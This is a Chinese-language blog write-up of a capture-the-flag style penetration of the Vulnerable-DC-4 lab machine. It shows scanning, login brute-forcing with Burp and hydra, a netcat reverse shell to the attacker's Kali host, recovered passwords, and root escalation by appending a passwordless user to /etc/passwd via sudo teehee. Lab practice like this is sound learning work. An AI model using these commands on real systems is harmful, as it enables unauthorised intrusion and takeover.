banner
Hi my new friend!

Vulnerable-DC-4靶机渗透学习

Scroll down

搭建环境

攻击机:Kali-linux-2022.1:192.168.31.120

靶机:Vulnerable-DC-4:192.168.31.247

信息收集

主机探活

arp-scan -l 或 nmap -sP 192.168.31.0/24

nmap扫描靶机IP
1
nmap -A -p- 192.168.31.247

渗透测试

发现开放了22和80端口,访问80端口

发现是一个登录窗口,用bp爆破得到密码happy

第一次登陆失败,再登陆一次

发现有命令执行

在kali上开启监听2222端口

nc -lnvp 2222

执行反弹shell的命令

nc -e /bin/bash 192.168.31.120 2222

get shell成功

用python进入交互模式

python -c ‘import pty;pty.spawn(“/bin/sh”)’

打开根目录,在jim中的backups发现密码

打开发现是密码

把密码放在本地的pass.txt中,用户名为jim

然后用hydra进行爆破得到密码jibril04

1
hydra 192.168.31.247 -L user.txt -P pass.txt ssh

用得到的账号密码连接ssh进行登录

发现有一封邮件,找到并打开发现是charles交给jim的密码

发现charles用户的密码

^xHhA&hvim0y

通过ssh登录到charles

进行teehee提权

echo “admin::0:0:::/bin/bash” | sudo teehee -a /etc/passwd

得到flag

总结

第一次打靶机,感觉确实挺难的,打的浑浑噩噩,不过还好,旁边有同志指导。接下来一边写博客然后再做一遍,没有第一次如同被抓小白兔的慌乱了。感觉自己学的还是很浅的,就像某大学的某“某知名书法家”说的一样吧,具体说什么就不赘述了。希望每天都很充实,回见!